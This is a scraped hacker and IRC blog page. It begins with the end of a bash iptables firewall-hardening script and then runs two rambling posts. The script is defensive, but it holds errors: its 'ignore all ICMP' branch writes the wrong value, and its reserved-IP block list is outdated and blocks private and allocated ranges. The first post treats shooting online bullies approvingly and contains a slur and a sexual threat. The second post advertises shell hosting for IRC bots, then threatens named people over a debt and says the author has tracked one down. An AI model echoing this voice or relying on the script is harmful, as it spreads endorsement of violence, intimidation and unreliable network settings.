"${IP6TABLES}" -t mangle -P PREROUTING ACCEPT
"${IP6TABLES}" -t mangle -P INPUT ACCEPT
"${IP6TABLES}" -t mangle -P FORWARD ACCEPT
"${IP6TABLES}" -t mangle -P OUTPUT ACCEPT
"${IP6TABLES}" -t mangle -P POSTROUTING ACCEPT
# Delete all rules.
"${IP6TABLES}" -F
"${IP6TABLES}" -t mangle -F
# Delete all chains.
"${IP6TABLES}" -X
"${IP6TABLES}" -t mangle -X
# Zero all packets and counters.
"${IP6TABLES}" -Z
"${IP6TABLES}" -t mangle -Z

fi

if [ -f "${CUSTOM_RULES_FILE_PRE}" ]; then
source "${CUSTOM_RULES_FILE_PRE}"
fi

# setup ipv4 forwarding
ip_forward="0"
if [ -n "${IPV4_FORWARDING}" ]; then
ip_forward="1"
fi
echo "Setting ip_forward to ${ip_forward}"
echo ${ip_forward} > /proc/sys/net/ipv4/ip_forward

# ip spoofing protection
ip_spoof="0"
if [ -n "${IP_SPOOFING_PROTECTION}" ]; then
ip_spoof="1"
fi
for i in /proc/sys/net/ipv4/conf/*/rp_filter; do
echo "Setting ip spoofing protection on ${i} to ${ip_spoof}"
echo ${ip_spoof} > ${i}
done

# syn flood attacks
syn_flood="0"
if [ -n "${SYN_FLOOD_PROTECTION}" ]; then
syn_flood="1"
fi
echo "Setting SYN flood protection on to ${syn_flood}"
echo ${syn_flood} > /proc/sys/net/ipv4/tcp_syncookies
echo "Setting tcp_max_syn_backlog to ${TCP_MAX_SYN_BACKLOG}"
echo "${TCP_MAX_SYN_BACKLOG}" > /proc/sys/net/ipv4/tcp_max_syn_backlog
echo "Setting tcp_max_tw_buckets to ${TCP_MAX_TW_BUCKETS}"
echo "${TCP_MAX_TW_BUCKETS}" > /proc/sys/net/ipv4/tcp_max_tw_buckets

log_from_mars="0"
if [ -n "${LOG_MARTIAN_IPS}" ]; then
log_from_mars="1"
fi
for i in /proc/sys/net/ipv4/conf/*/log_martians; do
echo "Setting martian sources logging on ${i} to ${log_from_mars}"
echo ${log_from_mars} > ${i}
done

# don't log invalid responses to broadcast
echo 1 > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses

# don't accept or send ICMP redirects.
icmp_redir="1"
if [ -n "${DISALLOW_ICMP_REDIRECTS}" ]; then
icmp_redir="0"
fi
for i in /proc/sys/net/ipv4/conf/*/accept_redirects; do
echo "Setting ICMP redirection acceptance on ${i} to ${icmp_redir}"
echo ${icmp_redir} > ${i}
done
for i in /proc/sys/net/ipv4/conf/*/send_redirects; do
echo "Setting ICMP redirection send on ${i} to ${icmp_redir}"
echo ${icmp_redir} > ${i}
done

# don't accept source routed packets.
sr_pack="1"
if [ -n "${DISALLOW_SOURCE_ROUTED_PACKETS}" ]; then
sr_pack="0"
fi
for i in /proc/sys/net/ipv4/conf/*/accept_source_route; do
echo "Setting routed packed disallowing on ${i} to ${sr_pack}"
echo ${sr_pack} > ${i}
done

if [ -n "${TCP_FIN_TIMEOUT}" ]; then
echo "Setting tcp_fin_timeout to ${TCP_FIN_TIMEOUT}"
echo "${TCP_FIN_TIMEOUT}" > /proc/sys/net/ipv4/tcp_fin_timeout
fi
if [ -n "${TCP_KEEPALIVE_TIME}" ]; then
echo "Setting tcp_keepalive_time to ${TCP_KEEPALIVE_TIME}"
echo "${TCP_KEEPALIVE_TIME}" > /proc/sys/net/ipv4/tcp_keepalive_time
fi
w_scal="1"
if [ -n "${DISALLOW_TCP_WINDOW_SCALING}" ]; then
w_scal="0"
fi
echo "Setting tcp_window_scaling to ${w_scal}"
echo "${w_scal}" > /proc/sys/net/ipv4/tcp_window_scaling

# TCP timestamp
echo "Setting tcp_timestamps to ${TCP_TIMESTAMP}"
echo "${TCP_TIMESTAMP}" > /proc/sys/net/ipv4/tcp_timestamps

# disallow multicast routing
# TODO: doesn't work
#m_rout="1"
#if [ -n "${DISALLOW_MULTICAST_ROUTING}" ]; then
#    m_rout="0"
#fi
#for i in /proc/sys/net/ipv4/conf/*/mc_forwarding; do
#    echo "Setting multicast forwarding on ${i} to ${m_rout}"
#    echo ${m_rout} > ${i}
#done

# disallow proxy_arp
p_arp="1"
if [ -n "${DISALLOW_PROXY_ARP}" ]; then
p_arp="0"
fi
for i in /proc/sys/net/ipv4/conf/*/proxy_arp; do
echo "Setting proxy_arp on ${i} to ${p_arp}"
echo ${p_arp} > ${i}
done

bp_rel="1"
if [ -n "${DISALLOW_BOOTP_RELAY}" ]; then
bp_rel="0"
fi
for i in /proc/sys/net/ipv4/conf/*/bootp_relay; do
echo "Setting bootp_relay on ${i} to ${bp_rel}"
echo ${bp_rel} > ${i}
done

s_redir="0"
if [ -n "${ENABLE_SECURE_ICMP_REDIRECTS}" ]; then
s_redir="1"
fi
for i in /proc/sys/net/ipv4/conf/*/secure_redirects; do
echo "Setting secure_redirects on ${i} to ${s_redir}"
echo ${s_redir} > ${i}
done

# enable changes
echo 1 > /proc/sys/net/ipv4/route/flush

# create some custom chains, useful for logging
# LOG packets, then ACCEPT
RLIMIT="-m limit --limit 3/s --limit-burst 8"
"${IPTABLES}" -N ACCEPTLOG
"${IPTABLES}" -A ACCEPTLOG -j ${LOG} ${RLIMIT} --log-prefix "ACCEPT "
"${IPTABLES}" -A ACCEPTLOG -j ACCEPT
# LOG packets, then DROP.
"${IPTABLES}" -N DROPLOG
"${IPTABLES}" -A DROPLOG -j ${LOG} ${RLIMIT} --log-prefix "DROP "
"${IPTABLES}" -A DROPLOG -j DROP
# LOG packets, then REJECT.
# TCP packets are rejected with a TCP reset.
"${IPTABLES}" -N REJECTLOG
"${IPTABLES}" -A REJECTLOG -j ${LOG} ${RLIMIT} --log-prefix "REJECT "
"${IPTABLES}" -A REJECTLOG -p tcp -j REJECT --reject-with tcp-reset
"${IPTABLES}" -A REJECTLOG -j REJECT
echo "Generated chains: ACCEPTLOG, DROPLOG, REJECTLOG"

# setup local communication
"${IPTABLES}" -A INPUT -i ${LO_IF} -j ACCEPT
"${IPTABLES}" -A OUTPUT -o ${LO_IF} -j ACCEPT

if [ -n "${DMZ_IF}" ]; then
"${IPTABLES}" -A INPUT -i ${DMZ_IF} -j ACCEPT
"${IPTABLES}" -A OUTPUT -o ${DMZ_IF} -j ACCEPT
echo "Permit all traffic on ${DMZ_IF}"
fi

# disable ports explicitly
for port in ${PORTS_TO_DISABLE}; do
"${IPTABLES}" -A INPUT -p tcp --dport ${port} -j DROPLOG
echo "Disabled input port ${port} on ${NET_IF} (tcp) (DROPLOG)"
"${IPTABLES}" -A INPUT -p udp --dport ${port} -j DROPLOG
echo "Disabled input port ${port} on ${NET_IF} (udp) (DROPLOG)"
done

if [ -n "${KILL_PORT_SCANNING}" ]; then
echo "Killing port scanning attempts on ${NET_IF}, against port ${PORT_SCANNING_PORT}, ban seconds: ${PORT_SCANNING_SECONDS}"
"${IPTABLES}" -A INPUT -i ${NET_IF} -m recent --name portscan --rcheck --seconds "${PORT_SCANNING_SECONDS}" -j DROP
"${IPTABLES}" -A FORWARD -m recent --name portscan --rcheck --seconds "${PORT_SCANNING_SECONDS}" -j DROP

# Once the day has passed, remove them from the portscan list
"${IPTABLES}" -A INPUT -i ${NET_IF} -m recent --name portscan --remove
"${IPTABLES}" -A FORWARD -m recent --name portscan --remove

# These rules add scanners to the portscan list, and log the attempt.
"${IPTABLES}" -A INPUT -i ${NET_IF} -p tcp -m tcp --dport "${PORT_SCANNING_PORT}" -m recent --name portscan --set -j LOG --log-prefix "Portscan(host_destroyed): "
"${IPTABLES}" -A INPUT -i ${NET_IF} -p tcp -m tcp --dport "${PORT_SCANNING_PORT}" -m recent --name portscan --set -j DROP

"${IPTABLES}" -A FORWARD -p tcp -m tcp --dport "${PORT_SCANNING_PORT}" -m recent --name portscan --set -j LOG --log-prefix "Portscan(host_destroyed): "
"${IPTABLES}" -A FORWARD -p tcp -m tcp --dport "${PORT_SCANNING_PORT}" -m recent --name portscan --set -j DROP
fi

# UDP
for port in ${UDP_PORTS_INCOMING_ALLOW}; do
"${IPTABLES}" -A INPUT -p udp --dport ${port} --sport 1024:65535 -j ACCEPT
"${IPTABLES}" -A OUTPUT -p udp --sport ${port} --dport 1024:65535 -m state --state RELATED,ESTABLISHED -j ACCEPT
echo "Allowing UDP incoming traffic on ${port} on ${NET_IF} (ACCEPT)"
done
for port in ${UDP_PORTS_OUTGOING_ALLOW}; do
"${IPTABLES}" -A OUTPUT -p udp --dport ${port} --sport 1024:65535 -j ACCEPT
"${IPTABLES}" -A INPUT -p udp --sport ${port} --dport 1024:65535 -m state --state RELATED,ESTABLISHED -j ACCEPT
echo "Allowing UDP outgoing traffic on ${port} on ${NET_IF} (ACCEPT)"
done

# TCP
for port in ${TCP_PORTS_INCOMING_ALLOW}; do
"${IPTABLES}" -A INPUT -p tcp --dport ${port} --sport 1024:65535 -j ACCEPT
"${IPTABLES}" -A OUTPUT -p tcp --sport ${port} --dport 1024:65535 -m state --state RELATED,ESTABLISHED -j ACCEPT
echo "Allowing TCP incoming traffic on ${port} on ${NET_IF} (ACCEPT)"
done
for port in ${TCP_PORTS_OUTGOING_ALLOW}; do
"${IPTABLES}" -A OUTPUT -p tcp --dport ${port} --sport 1024:65535 -j ACCEPT
"${IPTABLES}" -A INPUT -p tcp --sport ${port} --dport 1024:65535 -m state --state RELATED,ESTABLISHED -j ACCEPT
echo "Allowing TCP outgoing traffic on ${port} on ${NET_IF} (ACCEPT)"
done

# Timed ports
for port in ${TIMED_PORTS}; do
# TCP
"${IPTABLES}" -I INPUT -p tcp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --set
# log before TIMED_PORTS_HIT_COUNT
"${IPTABLES}" -I INPUT -p tcp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --update \
--seconds ${TIMED_PORTS_TIMER_SECS} --hitcount $((${TIMED_PORTS_HIT_COUNT}-1)) -j LOG
"${IPTABLES}" -I INPUT -p tcp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --update \
--seconds ${TIMED_PORTS_TIMER_SECS} --hitcount ${TIMED_PORTS_HIT_COUNT} -j DROP
echo "Setting up timed port feature on ${port} on ${NET_IF} (tcp) [seconds:${TIMED_PORTS_TIMER_SECS}|hit_count:${TIMED_PORTS_HIT_COUNT}] (DROP)"
# UDP
"${IPTABLES}" -I INPUT -p udp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --set
# log before TIMED_PORTS_HIT_COUNT
"${IPTABLES}" -I INPUT -p udp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --update \
--seconds ${TIMED_PORTS_TIMER_SECS} --hitcount $((${TIMED_PORTS_HIT_COUNT}-1)) -j LOG
"${IPTABLES}" -I INPUT -p udp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --update \
--seconds ${TIMED_PORTS_TIMER_SECS} --hitcount ${TIMED_PORTS_HIT_COUNT} -j DROP
echo "Setting up timed port feature on ${port} on ${NET_IF} (udp) [seconds:${TIMED_PORTS_TIMER_SECS}|hit_count:${TIMED_PORTS_HIT_COUNT}] (DROP)"

done

# ignore microsoft ports?
if [ -n "${IGNORE_MICROSOFT_SHIT}" ]; then
"${IPTABLES}" -A INPUT -p tcp -m multiport --dports 135,137,138,139,445,1433,1434,3306 -j DROP
"${IPTABLES}" -A INPUT -p udp -m multiport --dports 135,137,138,139,445,1433,1434,3306 -j DROP
fi

# ICMP TYPES
"${IPTABLES}" -N RELATED_ICMP
if [ -n "${ALLOW_SANE_ICMP}" ]; then
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp -m icmp -m limit --limit "${ICMP_PACKETS_PER_SECOND}/second" -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp --icmp-type destination-unreachable -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp --icmp-type time-exceeded -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp --icmp-type echo-reply -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp --icmp-type echo-request -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp --icmp-type parameter-problem -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -j DROPLOG
echo "Allowing sane ICMP, only accept some reliable ICMP packets"
elif [ -n "${FUCK_ICMP_I_DONT_NEED_IT}" ]; then
echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all
echo "Ignoring all ICMP traffic"
fi
ignore_icmp_broadcast="0"
if [ -n "${IGNORE_ICMP_BROADCASTS}" ]; then
# ignore broadcast requests
ignore_icmp_broadcast="1"
fi
echo "Ignoring ICMP echo broadcasts"
echo ${ignore_icmp_broadcast} > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts

# Rate Limit RST packets
if [ -n "${RST_PACKETS_PER_SECOND}" ]; then
"${IPTABLES}" -A INPUT -p tcp -m tcp --tcp-flags RST RST -m limit --limit "${RST_PACKETS_PER_SECOND}/second" --limit-burst 2 -j ACCEPT
fi

# make it even harder to multi-ping
"${IPTABLES}" -A INPUT -p icmp -m limit --limit 1/s --limit-burst 2 -j ACCEPT
"${IPTABLES}" -A INPUT -p icmp -m limit --limit 1/s --limit-burst 2 -j LOG --log-prefix PING-DROP:
"${IPTABLES}" -A INPUT -p icmp -j DROP
"${IPTABLES}" -A OUTPUT -p icmp -j ACCEPT
# Drop all fragmented ICMP packets, malicious
"${IPTABLES}" -A INPUT -p icmp --fragment -j DROPLOG
"${IPTABLES}" -A OUTPUT -p icmp --fragment -j DROPLOG
"${IPTABLES}" -A FORWARD -p icmp --fragment -j DROPLOG
# Allow all ESTABLISHED ICMP traffic.
"${IPTABLES}" -A INPUT -p icmp -m state --state ESTABLISHED -j ACCEPT ${RLIMIT}
"${IPTABLES}" -A OUTPUT -p icmp -m state --state ESTABLISHED -j ACCEPT ${RLIMIT}
# Allow some parts of the RELATED ICMP traffic, block the rest.
"${IPTABLES}" -A INPUT -p icmp -m state --state RELATED -j RELATED_ICMP ${RLIMIT}
"${IPTABLES}" -A OUTPUT -p icmp -m state --state RELATED -j RELATED_ICMP ${RLIMIT}
# Allow incoming ICMP echo requests (ping), but only rate-limited.
"${IPTABLES}" -A INPUT -p icmp --icmp-type echo-request -j ACCEPT ${RLIMIT}
# Allow outgoing ICMP echo requests (ping), but only rate-limited.
"${IPTABLES}" -A OUTPUT -p icmp --icmp-type echo-request -j ACCEPT ${RLIMIT}
# Drop any other ICMP traffic.
"${IPTABLES}" -A INPUT -p icmp -j DROPLOG
"${IPTABLES}" -A OUTPUT -p icmp -j DROPLOG
"${IPTABLES}" -A FORWARD -p icmp -j DROPLOG
echo "Configured stricted ICMP rules"

# explicitly drop invalid incoming/outgoing traffic
"${IPTABLES}" -A INPUT -m state --state INVALID -j DROP
"${IPTABLES}" -A OUTPUT -m state --state INVALID -j DROP
# If we would use NAT, INVALID packets would pass - BLOCK them anyways
"${IPTABLES}" -A FORWARD -m state --state INVALID -j DROP
echo "Dropped all INVALID incoming/outgoing traffic"

# PORT Scanners (stealth also)
"${IPTABLES}" -A INPUT -m state --state NEW -p tcp --tcp-flags ALL ALL -j DROP
"${IPTABLES}" -A INPUT -m state --state NEW -p tcp --tcp-flags ALL NONE -j DROP
echo "Made port-scanner life harder"

if [ -n "${SYN_FLOOD_PROTECTION}" ]; then
"${IPTABLES}" -N SYN_FLOOD
"${IPTABLES}" -A INPUT -p tcp --syn -j SYN_FLOOD
"${IPTABLES}" -A SYN_FLOOD -m limit --limit 2/s --limit-burst 6 -j RETURN
"${IPTABLES}" -A SYN_FLOOD -j DROP
echo "Made SYN packets life harder (setting 2/s limit, 6 burst packets thresholds)"
fi

if [ -n "${DROP_IANA_IPS}" ]; then
"${IPTABLES}" -A INPUT -s 0.0.0.0/7 -j DROP
"${IPTABLES}" -A INPUT -s 2.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 5.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 7.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 10.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 23.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 27.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 31.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 36.0.0.0/7 -j DROP
"${IPTABLES}" -A INPUT -s 39.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 42.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 49.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 50.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 77.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 78.0.0.0/7 -j DROP
"${IPTABLES}" -A INPUT -s 92.0.0.0/6 -j DROP
"${IPTABLES}" -A INPUT -s 96.0.0.0/4 -j DROP
"${IPTABLES}" -A INPUT -s 112.0.0.0/5 -j DROP
"${IPTABLES}" -A INPUT -s 120.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 169.254.0.0/16 -j DROP
"${IPTABLES}" -A INPUT -s 172.16.0.0/12 -j DROP
"${IPTABLES}" -A INPUT -s 173.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 174.0.0.0/7 -j DROP
"${IPTABLES}" -A INPUT -s 176.0.0.0/5 -j DROP
"${IPTABLES}" -A INPUT -s 184.0.0.0/6 -j DROP
"${IPTABLES}" -A INPUT -s 192.0.2.0/24 -j DROP
"${IPTABLES}" -A INPUT -s 197.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 198.18.0.0/15 -j DROP
"${IPTABLES}" -A INPUT -s 223.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 224.0.0.0/24 -j DROP
echo "Dropped all IANA-reserved IP ranges"
fi

# kick off identd quick
if [ -n "${KILL_IDENTD}" ]; then
"${IPTABLES}" -A INPUT -p tcp -i ${NET_IF} --dport 113 -j REJECT --reject-with tcp-reset
echo "Dropped identd request completely on ${NET_IF} (REJECT)"
fi

if [ -f "${CUSTOM_RULES_FILE_POST}" ]; then
source "${CUSTOM_RULES_FILE_POST}"
fi

# close both TCP and UDP
iptables -A OUTPUT -j REJECTLOG
iptables -A INPUT -j REJECTLOG
iptables -A FORWARD -j REJECTLOG

enjoy some protection!

comments: 0 » tags: bots MSDN SDK sdk tutorial botmaking vs6 cpp c++, code perl cpp vb vc coding coder coders coding mad crazy php python g++ gcc cc gdb linux linux-stuff, Eggdrop irc ircd ctcp bug exploit mirc bouncer socks psyBNC eggy wraith botpack eggypack eggy eggdropz, exploit ac1db1tch3z ABftw hack hacked owned own3d 0wn pwnd s3l1nux selinux ldt idt wtf-is-this-poc PoC code, exploit sploit xploit macosx macos darwin localroot local root exploit race condition bzip2 KF efnet-coders code exploit-for-darwin darwinOS puredarwin gnu-darwin freebsd ftpd vsftpd proftpd exploit e, firewall anti-ddos ddos anti-attack attack connection limits ipv6 iptables ip6tables ruby fast ruby

[Bully breakdown]: What? How? Power??? -> Read on… you to can kill your bully :P~

Posted on 21st April 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

Just saying, how lately there is a few cases of Internet bully victims, now since 2008 there is a few, latelty a few more… and they have been on news and are online,

http://articles.cnn.com/2011-05-05/justice/massachusetts.bullying.trial_1_phoebe-prince-harassment-kayla-narey?_s=PM:CRIME

One recent example, then in toronto ,CA and a few others wich were actually abit to graphic to go into.. but here is whats happening to the *bullies*

Bully Beatdown ,my original posts, have now become UFC related, I have personally been in touch with ufc about this with dana, and he is verymuch also, a hater of fagts online, mainly those who “troll” , “ddos” and basically push people to breakdown and, loose it..and this is whats happening:

http://www.liveleak.com/view?i=1dd3207be9

Shot to death for Int. Bullying , and just google “internet bullying” now, and you will see more about it and “what you can do” here is some infos…

http://uyn.blogspot.com.au/2009/10/can-you-go-to-jail-for-cyberbullying.html

and yea, sure if your in Usa you probably COULD shoot your bully and depending in wich state, the laws would have top permit the ONLINE evidence, ie: face(shit)book , twitt(s)err and other Scial medium wich is perverted, destroyed and does nothing but spread malware, malwares wich now actually target the *security* of FB itself.. idjits cannot still secure it.. and then not to mention those funky plugins that u just mussssst have right anyhow fk that, dont cop it, do something about it, atleast keep evidence of it, in that way yes, you could use it against people and screw them if they have been that way to you… it is fine to be one side on this but it is also fine to hate those wich are just born evil and have NOTHING nice todo online, ever.. for those people this message goes out, i will personally fist f**k you, and yes, if i dont find you, now, i am sure your OWN ghosts will…

have a lovely day and fuck you very much to those on efnet who take enjoyment from casuing misery, dont worry mates, your time is acomin… just because ppl are quiet, does not mean theyre stupid.

Anyhow, take care my brothers and sisters, and remember the BEATDOWN will continue, until i leave this god ridden network.

comments: 0 » tags: 4hours outside! bwahaha, bullys fuck you peter slipper guuilty shame and hope you rot in a prison cell in some lame arse max sec "pedo setup" jail where ya get a whole yes wait for it

LINUX HOSTING/IRC/ANTI-DoS NETWORK ~ GLOWSHELLS.NET IS FINALLY REOPENING!

Posted on 26th March 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

YEP FOLKS IT IS TRUE…

JUST WAITING ON FINALISING 2 OF THE DEDIS/COLOS AND ARE UP! THIS IS VERY AWESOME NEWS FOR ANYONE WHO STILL CARES FOR IRC!

YOU CAN BELIEVE IT GLOW WILL BEAT ANYONE,OFFER GTCOMM/STAMINUS/HOSTVIRTUAL AND ANOTHER UNNAMED COMPANY FOR ALL HOSTING/INCLUDES SOME WEB HOSTING EVEN IN SOME SPECIAL CASES IF THATS WHAT IS WANTED THEN GLOW WILL DOIT, IPV6 AND IPV4,THE GTCOMM BOXES ARE IRC/SHOUTCAST/IRCD/ANYTHING-YOU-WANT-ON-IRC BOXES AND, AT MOMENT IN MIDDLE OF PURCHASING THE DEDIS, AND, THE COLO BOX

REALLY GLOW COULD IOPEN AN HAVE OPENED AGES AGO, BUT, THEY JUST WAITED TO GET SOME DECENT IPV4 BACKBONES..SO I GUES THEYRE USABLE BUT, THEYRE JUST GOING TO ACTUALLY COMPETE, SOON…WICH WILL BE GREAT FOR EFNET.. AS, IT NEEDS THIS TYPE OF CO.

SOME MEMBERS WHO HAVE BEEN WITH US FOR AWHILE, WILL REALLY BE ADMINISTRATING THNGS, ALTHO, IT WILL BE ONLY THE SAME OWNER AS BEFORE *MOUSE_*WHO WILL BE HANDLING THE MAIN THINGS.

MOST OF IT THEN, WILL HAVE AN ADMIN OR ONE AND ONE CO ADMIN PER BOX WICH WILL BE ON CALL 24/7 AND IF NOT YOU GET 1MONTH REFUND, YEP THATS THE TRUTH, IF YOU ENTER, AND, ARE CUSTOMER, AND ARE NOT HELPED WITHIN, 15MINUTES OF YOUR CHANNEL STAY, THE MONTH OR, A VHOST, SOMETHING, IS AUTOMATICALLY AND MAGICALLY, FREE!!! CANT BEAT THAT FOR SERVICE,ATLEAST YA KNOW IT GONNA BE GOOD!

SINCE THE BOXES ARE IN USA/CANADA/FRANCE/NETHERLANDS/SINGAPORE ,WE DECIDED TO MAKE 100% UPTIME BOXES,AND THAT IS SIMPLY USING ONE GTCOMM ADDY, FOR IRC OFCOURSE, WICH SITS ON A 4000GBPS ANTI D0S NETWORK.IT IS THE BEST GLOW IS ABLE AND CAN DO AND IT IS ALSO THE MOST EXPENSIVE NETWORKING, AND REQUORES VERY HIGH ID FOR JUST AX, IS THE MOST EXPENSIVE ROUTE TO TAKE FOR ANY SERVER SETUPS I HAVE SEEN… THIS SEEMS LIKE A ROBUST SERVICE AND, BOASTING ALREADY 400 VHOSTS JUST IN IPV6, WICH HALF ARE NOT EVEN TURNED ON APPRENTLY..MEANING, THEY HAVE OMUCH, THEY REALLY NOW, JUST WANT TO MAKE IT SHARED AND, FOR THOSE WHO WANT 100% UPTIME WRAITH BOTPAX ETC, WELL, HOW CAN YA BEAT, A LOGIN WICH HAS 4 BOXES IN 4 COUNTRIES!! HAHA! YA CANT, IT IS PERFECT, YOU CONTROL THEM, YOU HAVE 100% CONTROL.. SO, YOU GET A 100% AWESOME PRODUCT IN THE END!!! IT IS AWESOME FOR ANYONE HOSTING WRAITH, AND JUST NOW AS IT IS ON THE VPS GTCOMM, IT IS ALREADY HOSTING VERY EASILY, OVER 5-6 PEOPLE AND, THATS WITH OVER 30 WRAITHS NOW..AND NOT ONE BIT OF LAG.

ALTHO THERE WILLBE A COLO BOX THIS WONT BE OPENING FOR ATLEAST ONE MONTH BUT THE DEDIS WILL OPEN THIS WEEK,AND THE VPS IS ACTUALLY UP,IS FINE FOR HOSTING SO GLOW HAVE ALREADY BEEN NOW ACEEPTNIG NEW PEOPLE WHO ARE SIMPLY FEDUP WITH ONE BOX/LOCATION AND/OR, SIMPLY KNOW THE DEICATION GLOWSHELLS HAS ALWAYS HAD WITH EFNET.

AS I UNDERSTAND IT WILL BE USING UNDERNET/AUSTNET/EFNET/DALNET/LCIRC/RIZON AND MOST COVERED NETWORKS WHO, WELL I ASSUME THOSE WERE OLD PLACES USED..

I KNOW FOR AUSSIES THIS IS ESPECIALLY COOL, AS ONE OF THE ADMINS IS AN AUSSIE, AND, HE IS NOT HALF BAD WHEN YOU ACTUALLY ARE NOT CALLING HIM AN A**E ETC..

ANYHOW FACT IS, GLOWSHELLS HAS AND ALWAYS WILL BE LIKE NO-OTHER, AND AT MOMENT IF YOUR INTERESTED IN ANYTHING THEN, HEAD TO EFNET IRC IRC.EFNET.ORG AND JOIN #GLOWSHELL-SUPPORT AND SIMPLY WAIT AND, WELL IM JUST WAITING TO SEE MOUSE OPPED AGAIN WHERE SHE SHOULD BE

I THANK PEOPLE ON EFNET, SPECIALLY SOME LIKE, RFS,CYPHER,FUZION,GIZMORE/WECHALL CHALLENGES,SERH,R0X0R,LORDNIKON,D3MON AND EINS AND EVEN JIMIGJ! HECK, YOU ALL HAVE SOMETHING UNIQUE IN SOME WAY…AND, I WILL BE SURE EVEYONE OF YOU IS HELPED…TALI FOR ALL YOUR HELP WITHOUT HARDLY KNOWING ME, WITH THE GTCOMM FAKE CHANNELS LOL)… AND, FUCKS TO ICER AND KRASHED, AND, YOU BOTH KNOW WHY, YOUR FUCKING BOTH BEEN BUSTED, BOTH HELPIN EACH OTHER, AND PEOPLE ARE STILL GETTING BUSTED…NOW, SINCE I HAVE REPORTED MR KRASHED TO GTCOMM, HIS DDOS HAS STOPPED.AND, I STILL DONT EVEN KNOW WHY HE DID NOT SIMPLY, TALK TO ME, LIKE HUMANS DO.

ANYHWO THINK HARD AND TALK FAST ARSEHOLE… BECAUSE, YOUR THE ONLY SOUR GRAPE IN MY MOUTH.

NOW, AS I WAS SAYING, ENJOY THE RETURN OF GLOWSHELLS AND BE NICE AS ALWAYS! HA!

DRU / XD / WORLDWIDE / KRYPTIK / AKA TEAM 0X90 , YEA, BITCHEZ, THE REAL DEAL HAS NEVER BEEN SO IN YA FACE.

NOW READ ON…

AND ON THE SOUR NOTE:

AS FOR ICER, YOU HAD A PACT WITH SOMEONE TO MAKE SOMETHING, YOU KNOW, SOMETIMES PEOPLE RELY ON THOSE FUNDS,A ND, WERE OF THE THOUGHTS THAT PERHAPS, YOU WERE IN NO PORBLEMS AS, YOU HAD NOT SAID ANYTHING AND, ASSUMED, EVEYTHING WAS GOING FINE, BUT, AS YOU SAW, IT WAS, ABIT OF DISTRUST ON ONE SIDE BUT, YOU HAD THE CHANCE TO TALK TO THE WEB DESIGNER AND INSTEAD YOU GO HAND THE MONEY TO SOME FUCKING YANKEE WHO PROLLY DOESNT NEED IT.

WELL YOU WILL PAY 200X 10, ATLEAST FOR THAT INSULT YOU SHIT HEAD.

AND NO, I DONT THINK YOUR A *FED* BUT, I DEFINATELY WONDER WHY YOU WOULD ALLOW THIS KRASHED FELLOW, WHO IS A KNOWN HBI SNITCHER, TO HAVE SOMUCH DAMNA XCS TO THE BOTS AND, EVEYTHING IT SEEMS ABOUT YOUR MAGICSHELLS FILTH COMPANY..AND OH FUNNY BUT, WHEN I INVESTIGATED THE IPS, I FOUND OMETHING FUNNY…YEA…AND, I WONT MENTION IT HERE BUT LETS JUST SAY, SHAME ON YOU FOR ALLOWING ANYONE TO RUN B OTNET FROM YOUR SHIT YOU MAGGOT. AND REMEMBER WHERE YOU LIVE, AND THEN WHY THEY ARE SO COCKY AND WHERE THEY LIVE.

JUST REMEMBER, I AINT A FUCKING CRIPPLE MOTHERFUCKER, YOU BETTER FIX THINGS VERY DAMN FAST ABOUT THAT 200 BUX WICH WA MEANT TO BE HEADED MY WAY, AND, THATS BUSINESS YOU CALL IT, TO USE ME, AS A GO BETWEEN, SO, I ASSUME YOU DONT SPEAK TO YOUR BOSSES THEN ? YOU JUST SEND IN A COFFEE BOY AND ASK HIM TO ASK THE BOSS YES / COZ YOU SAID, THATS HOW YOU DO BUSINES… AND, AS I SHOWED YOU, AND WILL KEEP SHOWING YOU, IT IS NOT HOW I DO MY BUSINESS, ASFAR AS I SEE IT, IM OWED 200BUX, AND, SURE, YOU CAN HAVE WHATEVER DEIGN YOU WERE ALREADY THINKING, OR SIMPLY, COP THE FINE, WICH IS MORE FUN FOR ME! BELIEVE ME ARSEHOLE, YOU OWN A SHITTY LITTLE INT CAFE I ALREADY TRACKED DOWN, NOW YOUR EVEN CLOSER TO ME THAN EVER…AND, YOU THINK I WONT USE YOUR CASH AGAINST YOU STUPID. WHERE YOU THINK THE PAIN IS GREEK ? EH, ITS ALWAYS IN THE PCKET.. ASK KCOPE, HE HAS NO PCOKETS THANKS TO HIS FUCKUP IN 2K9… AND STILL, WILL NEVER, EVER BE ACCPETED,EVEN IF HE MADE A REMOTE ROOT FOR EVRY OS IN EXISTANCE AND, I WILL BE SURE TO MAKE 